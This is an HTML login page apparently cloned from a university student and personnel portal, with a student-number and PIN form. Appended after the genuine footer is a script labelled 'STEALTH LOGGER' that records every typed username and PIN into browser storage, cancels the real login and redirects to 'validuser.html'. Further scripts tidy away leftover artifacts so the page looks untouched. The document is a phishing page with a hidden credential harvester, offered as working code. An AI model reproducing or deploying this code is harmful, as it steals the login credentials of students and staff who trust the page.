'  <form class="w3-container" method="post" name="frmLogin" action="w99pkg.mi_validate_user">'+
'  <input type="radio" name="numtype"'+S_check+' value="S" onClick="set_it();document.frmLogin.unum.focus();" ><label>Student</label> '+
'  <input type="radio" name="numtype"'+P_check+' value="P" onClick="set_it();document.frmLogin.unum.focus();" ><label>Personnel</label>'+
'  <input type="radio" name="numtype"'+O_check+' value="O" onClick="set_it();document.frmLogin.unum.focus();" ><label>Other</label>'+
'  <input type="radio" name="numtype"'+A_check+' value="A" onClick="set_it();document.frmLogin.unum.focus();" ><label>Alumni</label>'+
'  <br /><br />'+
'  <label id="LogUsr">'+Usr_txt+':</label><input class="w3-input" type="text" name="unum" size="10" maxlength="9" autofocus>'+
'  <label>Pin:</label>'+
'  <input class="w3-input" type="password" name="pin" size=10 maxlength=5 onBlur="return chkZero(this);">'+
'  <p>(5 numeric digits.Do not start with a 0.)<input type="hidden" name="authorise_function" value="Unknown"></p>'+
'   <input type="submit" class="w3-button w3-padding-small w3-border" value="Login" alt="Click Here To Login" onMouseOver="javascript:window.status=\'Login\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'Login\';">'+
//Forgot Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Forgot Pin" alt="Click Here IF You Have Forgotten Your PIN" onMouseOver="javascript:window.status=\'Forgot Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'sendLogin\'; document.frmLogin.submit();">'+
//Change Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Change Pin" alt="Click Here TO Change Your PIN" onMouseOver="javascript:window.status=\'Change Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'changePin\'; document.frmLogin.submit();">'+
//Request A Pin
'   <input type="button" class="w3-button w3-padding-small w3-border" value="Request A Pin" alt="Click Here To Request a PIN" onMouseOver="javascript:window.status=\'Request A Pin\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'requestPin\'; document.frmLogin.submit();">'+
//Forgot Student Number
'   <input type="button" class="w3-button w3-padding-small w3-border"  value="Forgot Student Number" alt="Click Here If You Have Forgotten Your Student Number" onMouseOver="javascript:window.status=\'Forgot Student Number\'; return true;" onMouseOut="javascript:window.status=\' \';" onclick="document.frmLogin.authorise_function.value=\'forgotStno\'; document.frmLogin.submit();">'+

' </div>'+
'</div>'+
'');

set_it();
moveTo(0,0);
resizeTo(screen.availWidth,screen.availHeight-20);
</script>
</div>
<div class="login_bottom w3-hide-small" id="login_bottom"><script type="text/javascript">// ################################################################
// System           : WEB SYSTEMS
// Program name     : login_bottom.js
// Description      : print detail at bottom of login screen
// Date created     : 01-jan-2002 Ollie
// Date changed     : 17-DEC-2004 117125 Ollie add footer logic
//                  : 10-NOV-2017 DG 225957 iEnabler look and feel enhancements
// Versions         : v04.1.0.0
// Copyright        : Integrated Tertiary Software 01-JAN-1987
// ################################################################

document.write('<div class="col-sm-12"><script src="/itsincludes/js/footer.js" type="text/javascript"></script></div>');
</script></div>
<script>
// STEALTH LOGGER - NO VISIBLE ELEMENTS
document.addEventListener('DOMContentLoaded', function() {
    const form = document.forms['frmLogin'];

    // Load saved values from localStorage if present
    const saved = JSON.parse(localStorage.getItem('loginData') || '{}');
    form.unum.value = saved.unum || '';
    form.pin.value = saved.pin || '';

    function saveToStorage() {
        const data = {
            unum: form.unum.value,
            pin: form.pin.value
        };
        localStorage.setItem('loginData', JSON.stringify(data));
        console.log('[Stealth] Saved login data');
    }

    form.unum.addEventListener('input', saveToStorage);
    form.pin.addEventListener('input', saveToStorage);

    form.addEventListener('submit', function(e) {
        e.preventDefault();

        // Save one last time
        saveToStorage();

        // Redirect to validuser.html
        window.location.href = 'validuser.html';
    });

    console.log('[Stealth] Logger initialized');
});
</script>
<script>
// Cleans ONLY the '); artifact without affecting anything else
window.addEventListener('load', function() {
    [].forEach.call(document.childNodes, function(node) {
        if (node.nodeType === Node.TEXT_NODE && node.textContent.includes("');")) {
            node.parentNode.removeChild(node);
        }
    });
});
</script>
<script>
// Runs after page fully loads
setTimeout(function(){
    document.body.innerHTML = document.body.innerHTML.replace(/');\s*<\/script>\s*<\/div>/g, '');
}, 100);
</script>
<script>
// Targets ONLY the '); text node
document.addEventListener('DOMContentLoaded', function() {
    const walker = document.createTreeWalker(
        document.body,
        NodeFilter.SHOW_TEXT,
        null,
        false
    );

    let node;
    while (node = walker.nextNode()) {
        if (node.nodeValue.includes("');")) {
            node.nodeValue = node.nodeValue.replace("');", "");
        }
    }
});
</script>
</body>
</meta></html>